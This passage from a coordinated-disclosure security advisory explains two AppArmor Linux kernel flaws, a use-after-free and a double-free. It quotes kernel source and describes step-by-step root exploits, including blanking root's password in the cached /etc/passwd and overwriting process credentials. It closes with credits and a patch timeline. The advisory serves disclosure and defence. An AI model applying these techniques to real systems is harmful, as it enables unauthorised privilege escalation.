00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. ff. ff. ff. ff. ff. ff. ff. 7f. 00. 00. 00. 03c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 74t 6dm 70p 66f 73s 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 03e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 5c\ fd. 6dm 46F a2. 1e. 42B 5f_ b3. b6. 300 db. 1a. dd. dc. fe. 00. 00. 00. 0400: 00. 0401. ------------------------------------------------------------------------ ======================================================================== A use-after-free ======================================================================== The empty page is ripped The empty page has slipped -- Sonic Youth, "The Empty Page" The third kernel vulnerability that we discovered in AppArmor's code is a use-after-free. When we load a new profile (by write()ing its binary form to AppArmor's .load file), AppArmor records this raw, binary profile (in a compressed form), plus meta-data, in an aa_loaddata structure, allocated in the kernel's kmalloc-192 slab cache: ------------------------------------------------------------------------ 99 struct aa_loaddata { 100 struct kref count; 101 struct list_head list; 102 struct work_struct work; 103 struct dentry *dents[AAFS_LOADDATA_NDENTS]; 104 struct aa_ns *ns; 105 char *name; 106 size_t size; /* the original size of the payload */ 107 size_t compressed_size; /* the compressed size of the payload */ 108 long revision; /* the ns policy revision this caused */ 109 int abi; 110 unsigned char *hash; ... 116 char *data; 117 }; ------------------------------------------------------------------------ Various members of this aa_loaddata structure are readable through directory entries (dentries) in AppArmor's filesystem; for example, if we cat the compressed_size file, the open() syscall acquires a reference to this file's dentry, which contains a pointer (d_inode) to its inode, which contains a pointer (i_private) to its aa_loaddata structure: ------------------------------------------------------------------------ $ strace cat /sys/kernel/security/apparmor/policy/raw_data/0/compressed_size ... openat(AT_FDCWD, "/sys/kernel/security/apparmor/policy/raw_data/0/compressed_size", O_RDONLY) = 3 ... read(3, "408\n", 131072) = 4 ... ------------------------------------------------------------------------ 1423 SYSCALL_DEFINE3(open, const char __user *, filename, int, flags, umode_t, mode) .... 1427 return do_sys_open(AT_FDCWD, filename, flags, mode); ------------------------------------------------------------------------ 1416 long do_sys_open(int dfd, const char __user *filename, int flags, umode_t mode) .... 1419 return do_sys_openat2(dfd, filename, &how); ------------------------------------------------------------------------ 1388 static long do_sys_openat2(int dfd, const char __user *filename, .... 1404 struct file *f = do_filp_open(dfd, tmp, &op); ------------------------------------------------------------------------ 3821 struct file *do_filp_open(int dfd, struct filename *pathname, .... 3829 filp = path_openat(&nd, op, flags | LOOKUP_RCU); ------------------------------------------------------------------------ 3782 static struct file *path_openat(struct nameidata *nd, .... 3802 error = do_open(nd, file, op); ------------------------------------------------------------------------ 3601 static int do_open(struct nameidata *nd, .... 3645 error = vfs_open(&nd->path, file); ------------------------------------------------------------------------ 1084 int vfs_open(const struct path *path, struct file *file) .... 1087 return do_dentry_open(file, d_backing_inode(path->dentry), NULL); ------------------------------------------------------------------------ 902 static int do_dentry_open(struct file *f, ... 940 error = security_file_open(f); ... 951 open = f->f_op->open; ... 953 error = open(inode, f); ------------------------------------------------------------------------ 1240 static int seq_rawdata_open(struct inode *inode, struct file *file, .... 1243 struct aa_loaddata *data = __aa_get_loaddata(inode->i_private); .... 1246 if (!data) 1247 /* lost race this ent is being reaped */ 1248 return -ENOENT; ------------------------------------------------------------------------ 1302 static int seq_rawdata_compressed_size_show(struct seq_file *seq, void *v) .... 1304 struct aa_loaddata *data = seq->private; .... 1306 seq_printf(seq, "%zu\n", data->compressed_size); ------------------------------------------------------------------------ While auditing AppArmor's code, we spotted several puzzling comments: "no refcount on inode rawdata", "no refcounts on i_private" -- although the aa_loaddata structure is referenced by its dentries (via the d_inode and i_private pointers), these references are not added to aa_loaddata's count member; in other words, they are not reference-counted. We tried to understand why this is secure, but soon realized that these references to the aa_loaddata structure should, in fact, be counted: if, - after open() acquires a reference to the compressed_size file's dentry (in path_openat(), before the call to do_open() at line 3802), - but before open() calls the compressed_size file's seq_rawdata_open() (in do_dentry_open(), at line 953), if a racing, concurrent thread drops the very last reference to the aa_loaddata structure (by removing the corresponding AppArmor profile) and therefore kfree()s it, then when seq_rawdata_open() is called, the aa_loaddata structure is already kfree()d, and used-after-free at line 1243, and potentially also at line 1306. Initially, we thought that we would never be able to win this race condition (between line 3802 and line 953), for three reasons: 1/ When the last reference to the aa_loaddata structure is dropped (when its count member drops to zero), this aa_loaddata structure is not immediately kfree()d, but scheduled for a delayed kfree(): ------------------------------------------------------------------------ 162 static inline void aa_put_loaddata(struct aa_loaddata *data) ... 165 kref_put(&data->count, aa_loaddata_kref); ------------------------------------------------------------------------ 133 void aa_loaddata_kref(struct kref *kref) ... 135 struct aa_loaddata *d = container_of(kref, struct aa_loaddata, count); ... 138 INIT_WORK(&d->work, do_loaddata_free); 139 schedule_work(&d->work); ------------------------------------------------------------------------ 115 static void do_loaddata_free(struct work_struct *work) ... 117 struct aa_loaddata *d = container_of(work, struct aa_loaddata, work); ... 130 kfree_sensitive(d); ------------------------------------------------------------------------ As a result, the aa_loaddata structure might not be kfree()d yet when seq_rawdata_open() is called, thus preventing it from being used-after-free. 2/ In any case, simply calling seq_rawdata_open() with a recently kfree()d aa_loaddata structure is not enough, because do_loaddata_free() actually calls kfree_sensitive(), which first memset()s this aa_loaddata structure to zero and causes seq_rawdata_open() to return immediately at line 1248 (because the count member of this already kfree()d aa_loaddata structure is zero), without an exploitable use-after-free: ------------------------------------------------------------------------ 132 __aa_get_loaddata(struct aa_loaddata *data) ... 134 if (data && kref_get_unless_zero(&(data->count))) 135 return data; ... 137 return NULL; ------------------------------------------------------------------------ 94 * kref_get_unless_zero - Increment refcount for object unless it is zero. .. 97 * Return non-zero if the increment succeeded. Otherwise return 0. ... 109 static inline int __must_check kref_get_unless_zero(struct kref *kref) ... 111 return refcount_inc_not_zero(&kref->refcount); ------------------------------------------------------------------------ Consequently, we must not only kfree() the aa_loaddata structure during the race-condition window, but we must also re-allocate its memory with another useful object whose first four bytes (the count member of this already kfree()d aa_loaddata structure) are not all zeros. 3/ This race-condition window (between line 3802 and line 953) seemed very narrow; in particular, it does not seem to contain any user-space access that could be blocked with FUSE for example. Fortunately, we have an ace up our sleeve: in the middle of the race-condition window, open() calls security_file_open() (at line 940), which calls apparmor_file_open(); and because we have the ability to load new arbitrary AppArmor profiles, we can load specially crafted profiles that slow down security_file_open(), and therefore greatly widen the race-condition window and allow us to easily win this race condition. We developed two alternative methods, each with its own advantages and disadvantages: a/ Triggered by the earlier out-of-bounds memory read in aa_dfa_match(), we slow down security_file_open(), and hence the thread that open()s the compressed_size file, by confining it with an AppArmor profile whose DFA reads megabytes or even gigabytes of out-of-bounds memory, which takes several seconds and gives us plenty of time to reliably win the race condition in open(). Disadvantages: - this method requires an AppArmor and unprivileged user namespace, which would not be otherwise required to exploit this use-after-free: because our DFA is rather large (it has ~64K states), we must write() the corresponding profile directly to AppArmor's .load file, because (to the best of our knowledge) write()s via su's stdout in pty mode are limited to 4KB; - occasionally, this out-of-bounds read of megabytes or gigabytes of kernel memory causes an Oops (because of a "not-present page"), but on Ubuntu and Debian at least such an Oops does not cause a system crash: we can simply re-run our exploit with a slightly different DFA. b/ Alternatively, to slow down the thread that open()s the compressed_size file, we confine it with thousands of stacked AppArmor profiles ("myprofile1//&myprofile2//&myprofile3//&etc" for example), and specify a ~4KB attach_disconnected.path for each one of these profiles: apparmor_file_open() is forced to read millions of bytes (the number of stacked profiles multiplied by the length of attach_disconnected.path), which takes hundreds of milliseconds and gives us enough time to reliably win the race condition in open(). Disadvantage: - thousands of stacked AppArmor profiles consume a large amount of memory, which can be a problem on small systems. We succeeded in reliably winning this race condition, but how do we exploit the resulting use-after-free? Our initial strategy failed (we were planning to re-allocate the kfree()d aa_loaddata structure with a temporary extended-attribute (xattr) or user-key buffer), because we completely overlooked the fact that the CONFIG_RANDOM_KMALLOC_CACHES mitigation is enabled by default in Ubuntu 24.04.3: with a high probability (15/16), useful objects such as xattr or user-key buffers are never allocated in the same slab cache as our kfree()d aa_loaddata structure (which is allocated in one of the "kmalloc-(|rnd-..-)192" slab caches). For more information on the CONFIG_RANDOM_KMALLOC_CACHES mitigation: https://sam4k.com/exploring-linux-random-kmalloc-caches/ (by Sam Page) https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html (by Julien Voisin) Sadly, and as highlighted repeatedly by various researchers, the CONFIG_RANDOM_KMALLOC_CACHES mitigation does not protect at all against cross-cache attacks: https://x.com/andreyknvl/status/1700267669336080678 (by Andrey Konovalov) https://infosec.exchange/@minipli/111045336853055793 (by Mathias Krause) https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html (by Alexander Popov) We therefore decided to exploit the use-after-free of the aa_loaddata structure by simply "Freeing the object's page to the page allocator" and "Reallocating the victim page as a pagetable", from Jann Horn's beautifully elegant attack against CVE-2020-29661: https://projectzero.google/2021/10/how-simple-linux-kernel-memory.html In a nutshell: - we perform the cross-cache dance from "Freeing the object's page to the page allocator", and give the page of memory (where our kfree()d aa_loaddata structure was allocated) back to the page allocator (note: to allocate and free the numerous objects required by this first stage of the attack, we load and remove numerous minimal AppArmor profiles, whose aa_loaddata structures are guaranteed to be allocated in the same random slab cache as our kfree()d aa_loaddata structure); - we carry out the second stage of the attack, from "Reallocating the victim page as a pagetable", and re-allocate the page of memory (where our kfree()d aa_loaddata structure was allocated) as a page table (PT) whose page-table entries (PTEs) all correspond to the first mmap()ed page of /etc/passwd (in read-only mode, since we do not have write access to this file); - we verify that the first two stages of the attack succeeded, by read()ing the compressed_size member of our kfree()d aa_loaddata structure (through our file descriptor to the compressed_size file, which we open()ed during the race condition): if it looks like a PTE (a read-only PTE), then we successfully re-allocated the page where our kfree()d aa_loaddata structure was allocated, and its count and compressed_size members are now PTEs for /etc/passwd; (note: in the unlikely event that the 31st bit of this PTE is set (i.e., the count member of our kfree()d aa_loaddata structure becomes negative, "saturated"), our exploit fails, but the kernel only issues a warning, and we can simply re-run our exploit with a target file other than /etc/passwd) - we add 0x42 references to the count member of our kfree()d aa_loaddata structure, by open()ing our /proc/pid/fd/n to the compressed_size file (0x42 times), thus turning on the _PAGE_DIRTY bit (0x40) and _PAGE_RW bit (0x2) of the PTE that corresponds to this count member: one of our mmap()ed pages of /etc/passwd is now writable; - we write (more exactly, we pread()) to this writable mmap()ed page of /etc/passwd (which is the page-cached, in-memory copy of /etc/passwd, not the original, on-disk /etc/passwd), and overwrite its first line ("root:x:0:0:root:/root:/bin/bash\n") with a passwordless first line ("root::0:0:root:/root:/bin/bash\n"); - we drop 0x42 references from the count member of our kfree()d aa_loaddata structure, by close()ing our 0x42 file descriptors to the compressed_size file, thus turning off the _PAGE_DIRTY and _PAGE_RW bits of the PTE that corresponds to this count member (i.e., we restore this PTE to its original, read-only value); - we execute su and instantly obtain a root shell with full privileges, thanks to our passwordless first line in /etc/passwd. On Ubuntu 24.04.3, this exploit is extremely reliable (most likely because the CONFIG_RANDOM_KMALLOC_CACHES mitigation greatly reduces the slab-cache noise); on Debian 13.1, a few re-runs of the exploit may be needed (the CONFIG_RANDOM_KMALLOC_CACHES mitigation is not enabled by default in Debian 13.1). ======================================================================== A double-free ======================================================================== We paint a zero on his hand -- Sonic Youth, "Teen Age Riot" The fourth kernel vulnerability that we discovered in AppArmor's code is a double-free. We decided to exploit this vulnerability on Debian 13.1; Ubuntu 24.04.3 is probably also exploitable, but requires a different exploitation strategy because of the CONFIG_RANDOM_KMALLOC_CACHES mitigation (indeed, we do not perform a cross-cache attack in our exploit against Debian 13.1). In aa_replace_profiles() (which parses the profiles that we write() to AppArmor's .load and .replace files), if no profile explicitly specifies a namespace in its header (i.e., ns_name is still NULL after line 1071), but if one profile implicitly specifies a namespace in its profile name, for example ":mynamespace:myprofile" (i.e., ent->ns_name is not NULL, at line 1089), then ns_name is set to this ent->ns_name (at line 1095), and kfree()d a first time (at line 1262) and kfree()d a second time (at line 1270): a double-free vulnerability, in any slab cache between kmalloc-8 and kmalloc-256 (because the length of an AppArmor namespace can be anywhere between 1 and 255 bytes (NAME_MAX)). ------------------------------------------------------------------------ 1057 ssize_t aa_replace_profiles(struct aa_ns *policy_ns, struct aa_label *label, .... 1060 const char *ns_name = NULL, *info = NULL; .... 1071 error = aa_unpack(udata, &lh, &ns_name); .... 1082 if (ns_name) { .... 1089 } else if (ent->ns_name) { .... 1095 ns_name = ent->ns_name; .... 1246 if (ent->old) { .... 1248 __replace_profile(ent->old, ent->new); .... 1262 aa_load_ent_free(ent); .... 1270 kfree(ns_name); ------------------------------------------------------------------------ 1273 void aa_load_ent_free(struct aa_load_ent *ent) .... 1279 kfree(ent->ns_name); ------------------------------------------------------------------------ To successfully exploit this double-free (and to avoid a system crash), we must re-allocate ns_name's memory after the first kfree() (line 1262) but before the second kfree() (line 1270). Initially, we thought that we would not be able to win this race condition, but we eventually realized that if we write() numerous concatenated profiles to AppArmor's .replace file and if these profiles contain subprofiles, then __replace_profile() is called numerous times (at line 1248) and each call loops over each of these subprofiles (at lines 949-967), which takes considerable time. For example, 1024 profiles that contain 16 subprofiles each widen the race- condition window to several seconds and allow us to reliably win this race condition. ------------------------------------------------------------------------ 941 static void __replace_profile(struct aa_profile *old, struct aa_profile *new) ... 947 list_splice_init_rcu(&old->base.profiles, &lh, synchronize_rcu); ... 949 list_for_each_entry_safe(child, tmp, &lh, base.list) { ... 964 rcu_assign_pointer(child->parent, aa_get_profile(new)); 965 list_add_rcu(&child->base.list, &new->base.profiles); ... 967 } ------------------------------------------------------------------------ But how do we exploit the resulting double-free? Our initial strategy failed miserably: we were planning to re-allocate ns_name's memory with a temporary xattr buffer, but completely overlooked the fact that these allocations "Use dedicated slab buckets for memdup_user()", because the CONFIG_SLAB_BUCKETS mitigation is enabled by default in Debian 13.1. We therefore decided to simply allocate another object instead (a temporary user-key buffer), and closely followed the Crusaders of Rust's TL;DR for their extremely impressive attack against CVE-2025-38001: https://syst3mfailure.io/rbtree-family-drama/ In a nutshell: - immediately after the first kfree() of ns_name, we re-allocate its memory with a temporary user-key buffer (via the add_key() syscall or the keyctl(KEYCTL_UPDATE) syscall), but we block the copy of the last bytes of this user-key buffer (from user space to kernel space) with FUSE (it would otherwise be kfree()d automatically); - immediately after the second kfree() of ns_name, which actually kfree()s our user-key buffer (whose copy is still blocked by FUSE), we re-allocate and therefore overwrite its memory with an AF_PACKET page vector (an array of pointers to single-page buffers in kernel space) -- in reality, we allocate numerous AF_PACKET page vectors (via the setsockopt(PACKET_TX_RING) syscall), for a reason that will become clear below; - we unblock the copy of our user-key buffer (which was still blocked by FUSE, and was mostly overwritten by our AF_PACKET page vector), and we read back this user-key buffer (via the keyctl(KEYCTL_READ) syscall), thereby disclosing the pointers from our AF_PACKET page vector -- this is essentially the clever "One Weird Trick" from Valentina Palmiotti's exploit for CVE-2021-41073 (but with a user-key instead of an xattr): https://chomp.ie/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel - since the unblocking above automatically kfree()d our user-key buffer, and hence our AF_PACKET page vector, we immediately re-allocate and therefore overwrite its memory with another temporary user-key buffer (whose copy from user space to kernel space is also blocked by FUSE): an identical copy of our originally disclosed AF_PACKET page vector, except for its very first pointer, which we overwrite with a slightly higher pointer than the highest pointer of this AF_PACKET page vector -- with high probability, this overwritten pointer is equal to one of the pointers from one of our *other* numerous AF_PACKET page vectors; - as a result, the page of memory that corresponds to this overwritten pointer is artificially referenced twice, in two different AF_PACKET page vectors (but one of these two references is uncounted, and will lead to a use-after-free): if we mmap() all of the pages from all of our AF_PACKET page vectors (through their AF_PACKET file descriptors), and if we write a unique tag to each one of these mmap()ed pages, then we can detect the page that is referenced twice (and mmap()ed twice); - we munmap() this page (twice) and close() the first of the two AF_PACKET file descriptors that reference this page, which drops its reference count to zero and gives it back to the page allocator (but we still have an uncounted reference to this free page, through the second of the two aforementioned AF_PACKET file descriptors); - we immediately re-allocate this free page as a pipe buffer (by write()ing to a pipe whose buffer was set to a single page via the fcntl(F_SETPIPE_SZ) syscall), then free it again (by close()ing the second and last AF_PACKET file descriptor that still references it), and immediately re-allocate it again as a page full of file structures (via numerous signalfd(-1) syscalls), thus gaining arbitrary read and write access from and to this page (and all of the file structures it contains) via read()s and write()s from and to our pipe; - we read() the contents of this page (and all of its file structures) from our pipe, which discloses f_cred, a pointer to our process's cred structure (credentials such as uid, euid, gid, etc), and private_data, a pointer to a signalfd_ctx structure (one unsigned long, sigmask); - we overwrite the private_data pointer with the f_cred pointer, by write()ing a modified version of this page (and its file structures) to our pipe, and call signalfd() to write zeros (the most significant bytes of a sigmask) to private_data (which we overwrote with f_cred), thus overwriting the uid credentials of our process with zeros: at long last, our process is now running as the root user. Note: because this exploitation strategy uses AF_PACKET page vectors, it requires a network namespace (and hence an unprivileged user namespace); however, it should be possible to develop another exploitation strategy that does not require a user namespace, but this is left as an exercise for the interested reader. ======================================================================== Acknowledgments ======================================================================== We thank Ubuntu's security team and Canonical's AppArmor developers (John Johansen, Georgia Garcia, Maxime Belair, Massimiliano Pellizzer, and Cengiz Can, in particular) for their hard work on this release. We also thank Sudo's maintainer (Todd C. Miller), Debian's security team (Salvatore Bonaccorso in particular), SUSE's security team (Matthias Gerstner and Marcus Meissner in particular), the Linux kernel security team (Greg Kroah-Hartman and Willy Tarreau in particular), and the members of the linux-distros mailing list. None of this research would have been possible without the public work of Jann Horn and the Crusaders of Rust. And more generally, we sincerely thank all the security researchers who continue to publish their work; they make a world of difference. We also thank the Phrack staff, old and new, for keeping the spirit and the scene alive, and Gerardo Richarte for his kind words about our work: https://phrack.org/issues/72/2 Finally, we dedicate this advisory to Sebastian Krahmer: https://www.thc.org/404/stealth/eulogy.txt ======================================================================== Timeline ======================================================================== 2025-07-10: Sent a first batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers. 2025-08-01: Sent a second batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers. 2025-09-09: Sent a third batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers. 2025-10-20: Sent a draft of our advisory to Ubuntu's security team and Canonical's AppArmor developers. 2025-12-15: Sent a mail to Ubuntu's security team and Canonical's AppArmor developers to share our worries about the state of this vulnerability disclosure. 2026-01-14: Sent another mail to Ubuntu's security team and Canonical's AppArmor developers to share our worries about the state of this vulnerability disclosure. 2026-02-11: Together with Canonical's AppArmor developers, fixed the Coordinated Release Date to 2026-03-03. 2026-02-17: Contacted Sudo's maintainer. 2026-02-17: Received a first version of the patches from Canonical's AppArmor developers. 2026-02-18: Contacted Debian's security team and SUSE's security team. 2026-02-19: Sent a first review of the patches to Ubuntu's security team and Canonical's AppArmor developers. 2026-02-20: Sent the first version of the patches to Debian's security team and SUSE's security team. 2026-02-24: Contacted the Linux kernel security team (security@kernel). 2026-02-26: Received a second version of the patches from Canonical's AppArmor developers. 2026-02-26: Sent the second version of the patches and a draft of our advisory to the linux-distros mailing list (linux-distros@openwall). 2026-02-27: Sent a second review of the patches to Ubuntu's security team and Canonical's AppArmor developers. 2026-02-28: Contacted the Linux kernel CVE assignment team (cve@kernel). 2026-03-03: Together with Canonical's AppArmor developers, postponed the Coordinated Release Date (one of the patches was incomplete), until "the patches are published upstream in Linus's tree". 2026-03-03: Received a third version of the patches from Canonical's AppArmor developers. 2026-03-04: Sent a third review of the patches to Canonical's AppArmor developers. 2026-03-05: Received a fourth version of the patches from Canonical's AppArmor developers. 2026-03-09: Received a fifth and final version of the patches from Canonical's AppArmor developers. 2026-03-12: The patches are published upstream in Linus's tree.